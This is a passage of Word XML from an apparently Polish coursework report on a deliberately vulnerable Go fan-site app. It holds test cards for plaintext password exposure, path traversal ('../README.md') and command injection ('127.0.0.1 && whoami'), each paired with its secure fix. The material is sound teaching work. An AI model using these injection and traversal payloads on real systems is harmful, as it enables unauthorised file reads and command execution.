          <w:b/>
        </w:rPr>
        <w:t>Kryterium zaliczenia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> decyzja jest po stronie serwera. UI może pokazywać lub ukrywać przyciski, ale bezpieczeństwo nie zależy od samego widoku.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="59" w:name="sec59"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.6. Karta A6 - member directory / Sensitive Data Exposure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Warunki wejściowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aplikacja uruchomiona najpierw w vulnerable, potem w secure. Widok </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Members</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pokazuje stan danych kont.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kroki manualne: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Otworzyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/members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 xml:space="preserve">W vulnerable sprawdzić kolumnę </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Zanotować, czy widoczne są wartości typu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>user1pass</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Przełączyć secure albo uruchomić aplikację z </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SECURITY_ENABLED=true</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Otworzyć ten sam widok.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sprawdzić, czy kolumna zawiera hashe bcrypt zaczynające się od </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>$2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik podatny:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> baza przechowuje hasła jawne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> baza przechowuje hashe bcrypt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kryterium zaliczenia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nawet jeśli atakujący pozyska </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>app.db</w:t>
      </w:r>
      <w:r>
        <w:t>, nie dostaje bezpośrednio haseł użytkowników.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="60" w:name="sec60"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.7. Karta A7 - fanart vault / Path Traversal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Warunki wejściowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja vault pozwala podejrzeć plik z katalogu uploadów. Test używa nazwy pliku sterowanej parametrem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kroki manualne: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Otworzyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/gallery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>Wpisać payload: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../README.md</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2076" w:name="lst76"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 76. Fragment materiału testowego (text). Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2076"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W vulnerable sprawdzić, czy aplikacja wyświetla treść pliku spoza </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploads/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Przełączyć secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Powtórzyć ten sam payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Sprawdzić komunikat blokady traversal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Żądanie techniczne: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l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y</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>n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d</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2077" w:name="lst77"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 77. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2077"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik podatny:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> odczyt pliku spoza katalogu uploadów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ścieżka jest odrzucona, bo po normalizacji wychodzi poza katalog bazowy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kryterium zaliczenia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja podglądu plików nadal działa dla poprawnych uploadów, ale nie dla ścieżek z </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="61" w:name="sec61"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>15.8. Karta A8 - stream relay check / Command Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Warunki wejściowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> funkcja </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stream check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> przyjmuje host i wykonuje diagnostykę </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kroki manualne: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Otworzyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/stream-check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>Wpisać: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127.0.0.1 &amp;&amp; whoami</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2078" w:name="lst78"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 78. Fragment materiału testowego (text). Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2078"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>W vulnerable sprawdzić, czy w output pojawia się wynik dodatkowej komendy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Przełączyć secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Wpisać ten sam payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t>Sprawdzić, czy input jest odrzucony przed wykonaniem komendy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Żądanie techniczne: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G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u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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/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r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-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e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k</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>?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7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6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6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827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w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o</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2079" w:name="lst79"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 79. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2079"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik podatny:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> powłoka wykonuje dodatkowy fragment po </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> walidator odrzuca metaznaki, a poprawne hosty są uruchamiane przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exec.Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh -c</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kryterium zaliczenia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zabezpieczenie nie tylko filtruje input, ale usuwa klasę błędu przez rezygnację z powłoki.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="62" w:name="sec62"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>16. Załącznik B: mapowanie zmian w plikach kodu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>main.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Odpowiedzialność: routing HTTP. Dodano funkcjonalne aliasy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/library</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/moderation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/members</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/gallery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/stream-check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Najważniejsza zmiana dotyczy profilu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> prowadzi do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ProfileSettings()</w:t>
      </w:r>
      <w:r>
        <w:t>, a nie do stale podatnej wersji formularza.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Odpowiedzialność: logika endpointów. Dodano </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ProfileSettings()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, które przełącza </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> między zachowaniem podatnym i secure na podstawie aktualnego trybu. Dzięki temu CSRF jest testowany na tej samej funkcji profilu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/views/pages.templ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Odpowiedzialność: widoki HTML. Zmieniono UI na MikuMiku Fan Hub i opisano podatności jako funkcje aplikacji. Formularz profilu pokazuje token tylko w trybie secure, ale nadal wysyła dane na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/views/pages_templ.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Odpowiedzialność: kod generowany. Plik został wygenerowany automatycznie przez Templ po zmianie widoków. Nie był edytowany ręcznie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/db/db.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Odpowiedzialność: migracja i dane startowe. Seed danych został dopasowany do narracji fanowskiego portalu Vocaloid/Miku.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>main_integration_test.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Odpowiedzialność: testy integracyjne. Dodano test potwierdzający, że </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> w trybie vulnerable przyjmuje sfałszowany POST bez tokena, a w trybie secure ten sam POST jest odrzucany.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>docs/Sprawozdanie_BAI_Funkcjonalnosci.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Odpowiedzialność: raport. Rozbudowano opis ataków o przebieg, screenshoty, fragmenty kodu, wynik podatny oraz wynik secure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="63" w:name="sec63"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>17. Załącznik C: checklista weryfikacji na żywo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Uruchomić aplikację w trybie vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pokazać nagłówek </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>MikuMiku Fan Hub</w:t>
      </w:r>
      <w:r>
        <w:t>, aby było jasne, że to aplikacja funkcjonalna.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Otworzyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Security map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i wyjaśnić, że jest to mapa przejścia przez funkcje.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dla SQLi użyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Library</w:t>
      </w:r>
      <w:r>
        <w:t>, nie endpointu API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Dla XSS użyć komentarza pod postem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dla CSRF użyć właściwej funkcji profilu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dla IDOR użyć zwykłego usuwania wpisu przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/posts/delete/:id</w:t>
      </w:r>
      <w:r>
